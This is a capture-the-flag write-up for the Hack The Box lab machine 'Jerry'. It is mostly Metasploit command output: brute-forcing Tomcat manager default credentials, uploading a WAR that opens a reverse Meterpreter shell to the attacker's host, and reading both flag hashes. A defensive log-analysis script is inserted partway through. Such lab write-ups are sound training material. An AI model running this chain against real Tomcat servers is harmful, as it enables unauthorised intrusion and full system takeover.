Today we are going to hack the HTB machine called Jerry.
It is rated as easy.
Enumeration
sml@m0nikE:~/ctf/htb/machines/jerry$ sudo nmap -A -p- -sS 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 21:04 CET
Nmap scan report for 10.10.10.95
Host is up (0.041s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   41.26 ms 10.10.14.1
2   43.46 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.82 seconds
We see that it is running Apache Tomcat, so we will use Metasploit to check whether we can
brute-force the manager login and obtain credentials. For this we use the module
auxiliary/scanner/http/tomcat_mgr_login with the wordlist it ships with by default.
Bruteforce Tomcat
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                   Required  Description
   ----              ---------------                                                                   --------  -----------
   BLANK_PASSWORDS   false                                                                             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                                 yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                             no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                             no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                             no        Add all users in the current database to the list
   PASSWORD                                                                                            no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt        no        File containing passwords, one per line
   Proxies                                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             8080                                                                              yes       The target port (TCP)
   SSL               false                                                                             no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                             yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                     yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                                 yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                            no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt    no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                             no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt       no        File containing users, one per line
   VERBOSE           true                                                                              yes       Whether to print output for all attempts
   VHOST                                                                                               no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
[-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We obtain the credentials:
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
With these credentials we can use the exploit exploit/multi/http/tomcat_mgr_upload,
which deploys a WAR through the manager application, to see if we can get a shell.
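The defender's view of the two steps above (default-credential guessing against the manager login, then a WAR deployed through /manager/html/upload), as an added example that is not part of the original walkthrough: a small Python script that parses Tomcat access-log lines in the default `%h %l %u %t "%r" %s %b` pattern and flags a source that accumulates 401s on /manager/html and then POSTs to the upload or undeploy endpoint. The sample log lines are constructed to mirror this writeup's sequence, and the `analyze` function and its threshold are my own choices, not anything from the target or from Metasploit.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample log (not captured from the machine): repeated manager
# guesses, a login as "tomcat", then WAR upload and undeploy, plus one benign client.
SAMPLE_LOG = """\
10.10.14.29 - - [05/Dec/2019:21:05:01 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.29 - - [05/Dec/2019:21:05:02 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.29 - - [05/Dec/2019:21:05:03 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.29 - - [05/Dec/2019:21:05:04 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.29 - - [05/Dec/2019:21:05:05 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.29 - - [05/Dec/2019:21:05:06 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.29 - tomcat [05/Dec/2019:21:05:07 +0100] "GET /manager/html HTTP/1.1" 200 11001
10.10.14.5 - - [05/Dec/2019:21:06:00 +0100] "GET /index.jsp HTTP/1.1" 200 1000
10.10.14.29 - tomcat [05/Dec/2019:21:07:30 +0100] "POST /manager/html/upload HTTP/1.1" 200 12000
10.10.14.29 - tomcat [05/Dec/2019:21:07:32 +0100] "POST /manager/html/undeploy?path=/Si6Mp3gsdJ HTTP/1.1" 200 11500
"""

MANAGER_ACTIONS = {'/manager/html/upload': 'upload', '/manager/html/undeploy': 'undeploy'}

def analyze(log_text, threshold=5):
    """Per source IP: count 401s on the manager app, record manager logins and
    deploy actions, and flag an upload from a source that also brute-forced the login."""
    failed = defaultdict(int)
    events = defaultdict(list)          # ip -> [(event, user), ...] in log order
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        ip, status = m['ip'], int(m['status'])
        path = m['path'].split('?', 1)[0]   # drop query string (e.g. ?path=/app)
        if not path.startswith('/manager/'):
            continue                        # only the manager app matters here
        if status == 401:
            failed[ip] += 1
        elif path == '/manager/html' and status == 200 and m['user'] != '-':
            events[ip].append(('manager_login', m['user']))
        elif path in MANAGER_ACTIONS and m['method'] == 'POST' and status == 200:
            events[ip].append((MANAGER_ACTIONS[path], m['user']))
    findings = {}
    for ip in set(failed) | set(events):
        brute = failed[ip] >= threshold
        deployed = any(e[0] == 'upload' for e in events[ip])
        findings[ip] = {'failed_logins': failed[ip], 'events': events[ip],
                        'brute_force': brute, 'deploy_after_bruteforce': brute and deployed}
    return findings
```

Running `analyze(SAMPLE_LOG)` reports 10.10.14.29 with six failed logins, a brute-force flag and a deploy flag, while the benign client never appears in the findings.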
Exploitation
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword s3cret
httppassword => s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 10.10.14.29:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying Si6Mp3gsdJ...
[*] Executing Si6Mp3gsdJ...
[*] Undeploying Si6Mp3gsdJ ...
[*] Sending stage (53906 bytes) to 10.10.10.95
[*] Meterpreter session 1 opened (10.10.14.29:4444 -> 10.10.10.95:49192) at 2019-12-05 21:07:31 +0100
meterpreter >
meterpreter > getuid
Server username: JERRY$
Good, we have a shell.
Let's see what privileges we have and grab the flags.
user.txt and root.txt
meterpreter > shell
Process 2 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>cd ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\
06/19/2018 03:07 AM apache-tomcat-7.0.88
08/22/2013 05:52 PM PerfLogs
06/19/2018 05:42 PM Program Files
06/19/2018 05:42 PM Program Files (x86)
06/18/2018 10:31 PM Users
06/19/2018 05:54 PM Windows
0 File(s) 0 bytes
6 Dir(s) 27,631,341,568 bytes free
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users
06/18/2018 10:31 PM .
06/18/2018 10:31 PM ..
06/18/2018 10:31 PM Administrator
08/22/2013 05:39 PM Public
0 File(s) 0 bytes
4 Dir(s) 27,631,341,568 bytes free
C:\Users>cd administrator
cd administrator
C:\Users\Administrator>cd desktop
cd desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users\Administrator\Desktop
06/19/2018 06:09 AM .
06/19/2018 06:09 AM ..
06/19/2018 06:09 AM flags
0 File(s) 0 bytes
3 Dir(s) 27,631,341,568 bytes free
C:\Users\Administrator\Desktop>cd flags
cd flags
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM .
06/19/2018 06:09 AM ..
06/19/2018 06:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,631,271,936 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>
End
And with that we have both the "user" flag and the "root" flag.